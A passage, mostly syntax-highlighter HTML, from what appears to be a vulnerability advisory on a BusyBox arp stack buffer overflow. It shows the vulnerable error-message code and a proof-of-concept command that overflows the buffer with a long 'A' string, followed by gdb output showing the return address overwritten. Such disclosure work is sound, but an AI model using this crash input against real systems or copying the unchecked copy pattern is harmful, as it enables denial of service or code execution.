class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-14\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-e\">xfunc_die<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-15\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f93990116890-16\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ret<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f93990116890-17\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f96308219126\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t\t\/\/verror_msg.c:31  &#8211; vasprintf(&amp;msg, s=fmt, valist p);  \t\t  \t\tvoid FAST_FUNC bb_verror_msg(const char *s, va_list p, const char* strerr)  \t\t{  \t\t\tchar *msg, *msg1;  \t\t\tint applet_len, strerr_len, msgeol_len, used;  \t\t  \t\t\tif (!logmode)  \t\t\t\treturn;  \t\t  \t\t\tif (!s) \/* nomsg[_and_die] uses NULL fmt *\/  \t\t\t\ts = &#8220;&#8221;; \/* some libc don&#8217;t like printf(NULL) *\/  \t\t  \t\t\tused = vasprintf(&amp;msg, s, p);\t\t\t\t\t\t\t\t\/** !! valist p is corrupt *\/  \t\t\tif (used &lt; 0)  \t\t\t\treturn;  \t\t\t&#8230;  \t\t}\t<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f96308219126-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f96308219126-18\">18<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-1\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-c\">\/\/verror_msg.c:31&nbsp;&nbsp;&#8211; vasprintf(&amp;msg, s=fmt, valist p);<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-2\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-3\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">FAST_FUNC <\/span><span class=\"crayon-e\">bb_verror_msg<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">va<\/span><span class=\"crayon-sy\">_<\/span>list<span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">strerr<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-4\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-5\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-t\">char<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">msg1<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-6\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-t\">int<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">applet_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">strerr_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">msgeol_len<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">used<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-7\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-8\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">logmode<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-9\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-10\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-11\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">!<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* nomsg[_and_die] uses NULL fmt *\/<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-12\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-c\">\/* some libc don&#8217;t like printf(NULL) *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-13\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-14\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-v\">used<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">vasprintf<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">msg<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">\t\t\t\t\t\t\t\t<\/span><span class=\"crayon-c\">\/** !! valist p is corrupt *\/<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-15\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">used<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-16\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f96308219126-17\"><span class=\"crayon-h\">\t\t\t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f96308219126-18\"><span class=\"crayon-h\">\t\t<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\">\t<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0021 seconds] -->  <\/p>\n<p>6. b) IOCTL does not fail<\/p>\n<p>As described in 3.\/4. the code proceeds with returning from <code>arp_getdevhw<\/code> eventually executing code from the <code>strcpy()<\/code> based overflow. (RET overwrite)<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Brutally smash the stack buffer (provide any IP as arg <code>HOSTNAME<\/code> to bypass name resolver):<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867ec288f99206532694\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \t# .\/busybox arp -v -Ds 1.1.1.1 $(python -c &#8220;print &#8216;A&#8217;*99&#8221;)  \tSegmentation fault  \t# dmesg  \tbusybox[5135]: segfault at 41414141 ip 080b8a5b sp bfa924fc error 4 in busybox[8048000+1fd000]  \t  \t# gdb &#8211;args .\/busybox_unstripped arp -v -Ds 1.1.1.1 $(python -c &#8220;print &#8216;A&#8217;*99&#8221;)  \t(gdb) r  \t&#8230;  \tProgram received signal SIGSEGV, Segmentation fault.  \t0x080b8a5b in vfprintf ()  \t(gdb) i r  \teax            0x0      0  \tecx            0xffffffff       -1  \tedx            0x0      0  \tebx            0xbffff42c       -1073744852  \tesp            0xbfffee6c       0xbfffee6c  \tebp            0xbffff408       0xbffff408  \tesi            0x1a     26  \tedi            0x41414141       1094795585  \teip            0x80b8a5b        0x80b8a5b &lt;vfprintf+13739&gt;  \teflags         0x10246  [ PF ZF IF RF ]  \tcs             0x73     115  \tss             0x7b     123  \tds             0x7b     123  \tes             0x7b     123  \tfs             0x0      0  \tgs             0x33     51  \t(gdb) bt  \t#0  0x080b8a5b in vfprintf ()  \t#1  0x0805b629 in vasprintf ()  \t#2  0x080f02aa in bb_verror_msg (s=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;, p=0xbffff540 &#8216;A&#8217; &lt;repeats 103 times&gt;, strerr=0x823a798 &#8220;No such device&#8221;)  \t    at libbb\/verror_msg.c:31  \t#3  0x080f18a1 in ioctl_or_perror_and_die (fd=3, request=35111, argp=0xbffff544, fmt=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;)  \t    at libbb\/xfuncs_printf.c:508  \t#4  0x0811365d in arp_getdevhw (ifname=0x41414141 &lt;Address 0x41414141 out of bounds&gt;, sa=0x41414141) at networking\/arp.c:222  \t#5  0x41414141 in ?? ()  \t#6  0x41414141 in ?? ()  \t#7  0x41414141 in ?? ()  \t#8  0x41414141 in ?? ()  \t#9  0x41414141 in ?? ()  \t&#8230;  \t(gdb) bt full  \t#0  0x080b8a5b in vfprintf ()  \tNo symbol table info available.  \t#1  0x0805b629 in vasprintf ()  \tNo symbol table info available.  \t#2  0x080f02aa in bb_verror_msg (s=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;, p=0xbffff540 &#8216;A&#8217; &lt;repeats 103 times&gt;, strerr=0x823a798 &#8220;No such device&#8221;)  \t    at libbb\/verror_msg.c:31  \t        msg = 0x13 &lt;Address 0x13 out of bounds&gt;  \t        msg1 = 0x0  \t        applet_len = -1073744492  \t        strerr_len = -1073744524  \t        msgeol_len = 0  \t        used = -1073744508  \t#3  0x080f18a1 in ioctl_or_perror_and_die (fd=3, request=35111, argp=0xbffff544, fmt=0x820cc85 &#8220;can&#8217;t get HW-Address for &#8216;%s'&#8221;)  \t    at libbb\/xfuncs_printf.c:508  \t        ret = -1  \t        p = 0xbffff540 &#8216;A&#8217; &lt;repeats 103 times&gt;  \t#4  0x0811365d in arp_getdevhw (ifname=0x41414141 &lt;Address 0x41414141 out of bounds&gt;, sa=0x41414141) at networking\/arp.c:222  \t        ifr = {ifr_ifrn = {ifrn_name = &#8216;A&#8217; &lt;repeats 16 times&gt;}, ifr_ifru = {ifru_addr = {sa_family = 16705, sa_data = &#8216;A&#8217; &lt;repeats 14 times&gt;},  \t            ifru_dstaddr = {sa_family = 16705, sa_data = &#8216;A&#8217; &lt;repeats 14 times&gt;}, ifru_broadaddr = {sa_family = 16705,  \t              sa_data = &#8216;A&#8217; &lt;repeats 14 times&gt;}, ifru_netmask = {sa_family = 16705, sa_data = &#8216;A&#8217; &lt;repeats 14 times&gt;}, ifru_hwaddr = {  \t              sa_family = 16705, sa_data = &#8216;A&#8217; &lt;repeats 14 times&gt;}, ifru_flags = 16705, ifru_ivalue = 1094795585, ifru_mtu = 1094795585, ifru_map = {  \t              mem_start = 1094795585, mem_end = 1094795585, base_addr = 16705, irq = 65 &#8216;A&#8217;, dma = 65 &#8216;A&#8217;, port = 65 &#8216;A&#8217;},  \t            ifru_slave = &#8216;A&#8217; &lt;repeats 16 times&gt;, ifru_newname = &#8216;A&#8217; &lt;repeats 16 times&gt;, ifru_data = 0x41414141 &lt;Address 0x41414141 out of bounds&gt;}}  \t#5  0x41414141 in ?? ()  \tNo symbol table info available.  \t#6  0x41414141 in ?? ()  \tNo symbol table info available.  \t#7  0x41414141 in ?? ()<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-35\">35<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-36\">36<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-37\">37<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-38\">38<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-39\">39<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-40\">40<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-41\">41<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-42\">42<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-56\">56<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-57\">57<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-58\">58<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-59\">59<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-60\">60<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-61\">61<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-62\">62<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-63\">63<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867ec288f99206532694-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867ec288f99206532694-70\">70<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-1\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\"># .\/busybox arp -v -Ds 1.1.1.1 $(python -c &#8220;print &#8216;A&#8217;*99&#8221;)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-2\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-e\">Segmentation <\/span><span class=\"crayon-v\">fault<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-3\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\"># dmesg<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-4\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-v\">busybox<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">5135<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">segfault <\/span><span class=\"crayon-i\">at<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">41414141<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">ip<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">080b8a5b<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sp <\/span><span class=\"crayon-e\">bfa924fc <\/span><span class=\"crayon-i\">error<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">busybox<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">8048000<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">1fd000<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-5\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-6\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-p\"># gdb &#8211;args .\/busybox_unstripped arp -v -Ds 1.1.1.1 $(python -c &#8220;print &#8216;A&#8217;*99&#8221;)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-7\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">gdb<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">r<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867ec288f99206532694-8\"><span class=\"crayon-h\">\t<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-sy\">.<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867ec288f99206532694-9\"><span 